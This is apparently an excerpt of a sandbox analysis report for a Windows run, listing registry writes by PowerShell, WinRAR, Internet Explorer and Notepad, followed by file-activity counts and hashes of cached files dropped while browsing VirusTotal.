HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
IntranetName
1
2064
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
1
2064
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
0
2940
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
ShellExtBMP
2940
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
ShellExtIcon
2940
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
name
120
2940
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
size
80
2940
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
type
120
2940
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
mtime
100
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing
NTPDaysSinceLastAutoMigration
3
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing
NTPLastLaunchLowDateTime
3312177648
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing
NTPLastLaunchHighDateTime
30768812
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\UrlBlockManager
NextCheckForUpdateLowDateTime
3612740538
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\UrlBlockManager
NextCheckForUpdateHighDateTime
30768812
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
CachePrefix
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
CachePrefix
Cookie:
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
CachePrefix
Visited:
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
CompatibilityFlags
0
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
ProxyEnable
0
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
460000007D000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
ProxyBypass
1
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
IntranetName
1
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
1
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
0
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
SecuritySafe
1
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Recovery\Active
{02E153D4-EAA0-11E9-9008-5254004AAD21}
0
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
FullScreen
no
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\WindowsSearch
UpgradeTime
9B7D15C6AC7ED501
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\WindowsSearch
UpgradeTime
321616C6AC7ED501
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
Window_Placement
2C0000000200000003000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF20000000200000004003000078020000
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery
Active
0
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Type
3
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Count
4
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Time
E3070A00030009000E0015000100FA00
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Blocked
4
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\EUPP Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\DHP
ChangeNotice
0
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\EUPP Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\DSP
BackupDefaultSearchScope
00000000A60700001577B53884CDE6EE334695EAF795B2B9685E116F8267416B698813542C720427FDCF1E4BCC6249F25FA6C4D0D2E71A5DA1FF69147F23BE12A474B3BF3D4C744E876150F67A4D4D81A9073EA04164C9EB16AA391479C49F2A12B2A4E33D33C777E3CCAB243FACC4B6AF09087BB6FD8BAEA1FD2184D069619710E1ECAF1F47F80B8CB0C3F989A02713E04CA41E08D477AB3D9A079B9A34FCE5E6A00DE352A81193DBADD287A9492D5BCB700950F0073C60491F4D704244E3124091F0BF17760DA08E63B01630C813C12616B55642B85E58DD2DE94839B9239F165396CB76D1C784A572C7F96E3B7C641DDDF284BE05B488356585783AB3C1F3EC8587A40AD92ADE7B7AEFF7ADC3951C106351D43D101683C46501CFB951E41606C91DE3ACAEF3EB4E1B3F3F74811397EE4B799083F7867668CFEF94EBB592AD76BE0A0BF870FAB64DF588EF31936EC1AA349C0D13DC94FE1441841B2AFE2E56DE03988FAF3FEA0C61A86A2EF21AA9869ABEC07A91DDA0C39C5C8ADD4D4C11461B3A19E5F33BE34681D35BCBD936CCDE7E8A24B3441C38ED28C14A29BFBEA9436F0226A4CA84A1E1FB18C07B43083526573675306FB87C61D90EB3618D76B0E6DAFA3FBB903AB4E8AA16109D3CAE29CE0E6394FEE6D09CD364E55DCD0B93BD2F38C444B2DB7DA22AC36D7F8ED949C057E8B19CCD628622AAFAE4CEF325355E6B70FFBBFBD96D3B45FCBDE4926AFAD59FD2C0A805F9F85EA89DAC188B2E7CD866E44A07598F2AC07B34A6954B1FDF377CEF301EF400484A7332DE2EFA8587AEF36247D74BCAD4546165C856BE9419C4A973A2DD06DE9472E19618FA61EF7814BF8C94E297B08B2D4F23C395EAF2C8760540B4BE1419FE671A44FC6E40126E3173CBD39FD6AB6F59AF4E374EEF410DD91A25078BBAD6A43287EC289D9B4589CB2C36A3C51991A0CE137EC46FC22506D801523B1CC429A8E895A33D84C483E8BC3F9FA30C9DCC3E641F4A0A6678F9D47F88EEF0BCA59A28484469DC2AA19EAD1E4CF8751A8AA769FB3DDCA8D518FC970BB1CFC6860956468685B5A3788CF0F7F8A26CB834C88D41F92DA240DE062670647F995DFB65F0204F7246349AC467E6E5F78E0B04E170E78156D571DFF5FD7DCF1164563FAC03D81F44E32D346D789ABA68F61005F4677992F4D8DBE070A7DF6A13244FF101A78CE02DD42F3C17BD32E3D24966CAB67A18410EE21EC0F03AB7847120E987883B5ECEF328DB80E4F3D06F72D3AC85863CE4E43C16DA71833123E36FA6C4F63CFE6CDC63C9CF05346893A9DCFF84358F52FD0D4772AF0E01DB441AFDC8800EDCE4D85D905FADFAE21E9B82415C8D27F905831289203D36D4863A55678FBD37E37FC10FE3E21373159D074701A966D92E5A968E2B4824604F51266051721CEF95E5461EFE62A35E9B89F90F8EAEB18F2C5F56212D67049891EC26C803583B371B3889DE6B26FB70DDC590FDA5620DA4E60CE3D73AAE7CEC02EA5B65083CBB91A7F3A8471DE0BCEC5750EC3ED1D319FBB84A5D0257912EF95264E69815A83CB8B659C57EBE4E87DDAD7A2D8B3B1577A5E77CE46F57A2B9F61473E5674DCA5E8955C4FEC3D3C9FA324591724FD758C681383F983924C7BDC1E4CC7995C5B2C16F805375BCAC74B7B074DBDD69D0A8A5968F2B99CBDAB0DA0D1D89C293698D05BA86AE4872231E5C4444568D14513CB642A22707F9ADCCB0551F7AE1322373CB0D8D6899022BBA8A4CBA6DA27B9A2A9819BB720277A36DDFAE247CF4A7573BB16F13A686E3356EE2C3BA613C4C62AAEA4F8D18AACC1A3B078BB0EA1C37B51858778E7131CD5EDA024475A47A758D0A4E7A15F21F582502C8DB77797A684FED60F415DBB87E6F628C8162F17E92307063BB8ADE8153AF57C2E4F1272CF709E169271C0F3DC7AC121EC7D62C67FEE7C0C83B66F3F0CF786A95A86BFD532B578A13363BD0DE307B8059501A57555977071FE670F28CD2DC8EE017B0810F70457AFF4D0C06BDF1CC20DE651D9C676FC3760744E6D0756F6CAA45223C498104D758CBD91372F9F760CA4B94B2D5BF6612C11F64ABDDCBC152A063C90513C77CB5131842BCA8B16AD77C42CE620C7C91A33409DB8AFAAEF192C4DA82D2D402E625B28625607F07138EBB619BC325BEB5927764828CD53E900BDD4A66216D53CC5CDFB54965E319F155AF49066E5AA5EA0A96CF5457879BB9542953B6991FD83C17AF454D651B099DEC149B9F77E0504FCC45EC1F9F46E585622695C61AC8B25B8774D7406ADCF59453E5F5DB82FCE108029259C7AD8E3C43013DB0CD4B9801C8905B095F386AFF25ED4EF9375D0177DB65EFB8BAF0ADC0C51C784448C447E60D56387C47A8D145F36DFD457B2F6132AAB13FA8C19E9091A3D978F157C34C7F581607D09A112AE92B9B837A453882311C69A0C81C6798CF847D6C572575D1ED0C54FBA5E6C6D90968E08B39F31ED096E7EAEFBAEC38C89A9D27C2156ACB9350B75AA29BB89C35C7F3AAAE20E5CFEF803CD4371D970E9912E557B8CDAFDF22C9B8019B529087B041429B06D1FCE9040F8CB9859035D84B580E48801E9AEEBC764ED0276BFA455099AF88FDEA1BBF7E63D027E6B5E1686D8AFD1798A85EDCB878116629840E179BED804D9E0C1BE3A59B2FF8482B947873C901BEE80B414967F019390C3E608C1A5F606C0DD8B647D6D922F78F9180BC3C35F4D91AE7A73C10FCD0A1F639075B8A0DE679B2EC25EC073CFCD8FF89C10343EE464229DC5657ACBD010000000E0000007A67784775642F5046646B2533640200000000000000
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\User Preferences
88D7D0879DAB32E14DE5B3A805A34F98AFF34F5977
01000000D08C9DDF0115D1118C7A00C04FC297EB01000000DF7B819B12B3F64EA1522C0F978D8A50000000000200000000001066000000010000200000000E157860AB4D23611727AF90E34DED64C17FDF74714F2B8F490502859D08FA89000000000E800000000200002000000062605945EC442B1107D887EFBA5666E778950E1E1385BF34FEC141EA1368A87F50000000F046A74D07937A4CCF19A591F5F9B3030FB9A09F2EFC22050181F5E18A4C363AAA869188BDDAC3629128B832D39554703BB81BBB731D5566FC3DB75E28B1C4A9295A73AD0359CEB7716040639779174C40000000AF0958941AB89A938E2A904FCE02B1841B96B17CF2FDB47043ABA5C864754983E294D8E590E0B8FA122B402C2A81656A9CE76F90A044D863717E812BFA943583
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\EUPP Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\DSP
ChangeNotice
0
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\User Preferences
2D53CFFC5C1A3DD2E97B7979AC2A92BD59BC839E81
01000000D08C9DDF0115D1118C7A00C04FC297EB01000000DF7B819B12B3F64EA1522C0F978D8A5000000000020000000000106600000001000020000000C76DAAD76AD8BFD4942DB86D60E1624B367E02A43BB48E57131E4430082BB9BA000000000E8000000002000020000000C54CC9CBC768F80F4B4E7FB5350E59EBFE12DFDE0D835F5673B7F36320C4453A10000000423FFA0115227195A4D186642E9404CE4000000001F622A629CB3AA7C9C237C559C3205EAA1692881B859AA192C7AF7126CB8351BD35DBBD8909F86D05FFD42F363AC159D3B0AA556E206A839CDEC71BA47CF5F6
2172
iexplore.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\73\52C64B7E
LanguageList
en-US
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Count
5
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Time
E3070A00030009000E0015000F002302
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Blocked
5
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs
url1
http://www.virustotal.com/
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLsTime
url1
6279B3D6AC7ED501
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs
url2
http://fb.com/
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLsTime
url2
0DAED6B72920D401
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs
url3
nba.com
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLsTime
url3
0000000000000000
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs
url4
msn.com
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLsTime
url4
0000000000000000
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs
url5
timeanddate.com
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLsTime
url5
0000000000000000
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs
url6
weblio.jp
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLsTime
url6
0000000000000000
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs
url7
telegraph.co.uk
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLsTime
url7
0000000000000000
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs
url8
suning.com
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLsTime
url8
0000000000000000
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs
url9
almasryalyoum.com
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLsTime
url9
0000000000000000
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs
url10
.com
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLsTime
url10
0000000000000000
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs
url11
google.com.br
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLsTime
url11
0000000000000000
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs
url12
.com.tw
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLsTime
url12
0000000000000000
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs
url13
sberbank.ru
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLsTime
url13
0000000000000000
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs
url14
rarbg.to
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLsTime
url14
0000000000000000
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage
DecayDateQueue
01000000D08C9DDF0115D1118C7A00C04FC297EB01000000DF7B819B12B3F64EA1522C0F978D8A5000000000020000000000106600000001000020000000E2BAA72704CEB2A125218BC1CB4BA25F5BD1452BA07E26DAB306A2F85213B732000000000E80000000020000200000008A64E4979A275694129B0709B00C2204FD1D53763CCA7A5399984CD8022D856B30000000E04D3A16B0D0D1ECEB2C2896754494C7DABE321432E6F8209FA154CCC8025FD27A0B860E4F1FB041A2D3F102364C968F400000007FB12A0839FB7CD9A1D5FCAAFD39C0F6C0D16C1C468203F9783805A1DB211901EA918BFE513F847133347DAB56AF3AA601DC09A5090A2A724F35E77D3ACC3EF3
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage
LastProcessed
E049A59ABD7ED501
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\VersionManager
LastCheckForUpdateLowDateTime
3637877257
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\VersionManager
LastCheckForUpdateHighDateTime
30768812
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation
CVListXMLVersionLow
395188360
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation
CVListXMLVersionHigh
268435456
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation
CVListLastUpdateTime
3670862
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
VendorId
0
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
DeviceId
0
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
SubSysId
0
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
Revision
0
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
VersionHigh
0
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
VersionLow
0
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
DXFeatureLevel
0
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
Wow64-VendorId
0
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
Wow64-DeviceId
0
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
Wow64-SubSysId
0
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
Wow64-Revision
0
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
Wow64-VersionHigh
0
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
Wow64-VersionLow
0
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
Wow64-DXFeatureLevel
0
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\UrlBlockManager
HashFileVersionLowPart
2
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\UrlBlockManager
HashFileVersionHighPart
0
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\UrlBlockManager
NextCheckForUpdateLowDateTime
589838130
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\UrlBlockManager
NextCheckForUpdateHighDateTime
30768863
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation
IECompatVersionHigh
268435456
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation
IECompatVersionLow
395188360
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation
StaleCompatCache
1
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Count
6
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Time
E3070A00030009000E00150022002500
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Blocked
6
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames
it-IT
it-IT.1
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\DomainSuggestion
NextUpdateDate
277395834
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing
NTPGoldbarText
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing
NTPGoldbarOKText
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing
NTPGoldbarCancelText
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing
NTPMSNintervalInDays
20
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing
NTPRestoreBarLimit
1
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing
NTPOnlinePortalVer
3
2172
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing
NextNTPConfigUpdateDate
277444425
2484
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\LowCache\Content
CachePrefix
2484
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\LowCache\Cookies
CachePrefix
Cookie:
2484
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\LowCache\History
CachePrefix
Visited:
2484
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\virustotal.com
NumberOfSubdomains
1
2484
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\Total
3269
2484
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\www.virustotal.com
38
2484
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\virustotal.com
Total
38
2484
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\Total
3231
2484
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\www.virustotal.com
0
2484
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\virustotal.com
Total
0
2484
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\Total
15830
2484
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\www.virustotal.com
12599
2484
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\virustotal.com
Total
12599
2484
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\Total
15934
2484
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\www.virustotal.com
12703
2484
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\virustotal.com
Total
12703
2996
NOTEPAD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Notepad
iWindowPosX
88
2996
NOTEPAD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Notepad
iWindowPosY
88
2996
NOTEPAD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Notepad
iWindowPosDX
960
2996
NOTEPAD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Notepad
iWindowPosDY
501

Files activity

Executable files
0
Suspicious files
40
Text files
151
Unknown types
1

Dropped files

PID
Process
Filename
Type
2172
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\K78MRVB5\search[1].json
text
MD5: 449f61c84cd2f7342f95403c908c0603
SHA256: 19170bd75edc0b5183a2f9fcc3001d9d222deff61e5915ad1127b65ab581a2a1
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\UJFUX3OG\aea7e831[1].js
text
MD5: eee26aac05916e789b25e56157b2c712
SHA256: 249bcdcaa655bdee9d61edff9d93544fa343e0c2b4dca4ec4264af2cb00216c2
2172
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\DomainSuggestions\it-IT.1
binary
MD5: 5a34cb996293fde2cb7a4ac89587393a
SHA256: c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
2172
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D2U1WPAC\suggestions[1].it-IT
binary
MD5: 5a34cb996293fde2cb7a4ac89587393a
SHA256: c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
2172
iexplore.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\VI1ZP4ZM.txt
text
MD5: faa5880193ec5ded2f2136832a3f4de5
SHA256: c15903c4b5a900b9a7c3d8fd39f0364eee347667d0c9ec7997c2b6a0ff08acc9
2172
iexplore.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\VH4QKYH9.txt
––
MD5:  ––
SHA256:  ––
2172
iexplore.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\HWEGGTCC.txt
––
MD5:  ––
SHA256:  ––
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\XLWA6BPE\shared_bundle_6[1].htm
html
MD5: 302e14969095715d2244c91d10c5c2db
SHA256: bffb3e3d7e90dcd4df72e57fde045c77c5a276edb0ebbfed4641614ef1e66795
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\UJFUX3OG\shared_bundle_14[1].htm
html
MD5: 08bce929a75403494181a962e9d63c5f
SHA256: 4900fe4a1579ee64d74478cacd3ea78e0641e02bdf40bb8af2d515c684714f71
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\UJFUX3OG\shared_bundle_4[1].htm
html
MD5: a3b7387d2dc98c07f33dae359d4c1e9f
SHA256: 40bd16b47ccb549172f78eb71afcad2baf838a9b8faf6d60582871cdc3449e87
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\UJFUX3OG\shared_bundle_5[1].htm
html
MD5: e2b4cf2112827cca7ed78b94a0dd8c02
SHA256: 24fd8de9cdf0d7dd837767f7979cd036dc4cefdc4ac10670827643b9d6f17dce
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\ZOYIQ18X\shared_bundle_13[1].htm
html
MD5: 07d205e1888aa7e5eb0caac98d91bfc7
SHA256: 48e6611991f35e21f963d9b4ef1cff511af208d5ac512570bcf195624b8dd63c
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\ZOYIQ18X\vt-ui-submissions-info[1].htm
html
MD5: ed647ac3d51452ded47d1b689adbf864
SHA256: fa56b6dac9d41be9f8be31d8e1b1bede681ab5081ee1bbaa55f09dbd04acb831
2484
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\ZOYIQ18X\shared_bundle_18[1].htm
html
MD5: f10b1563e52cca8bd0220085155cf76a
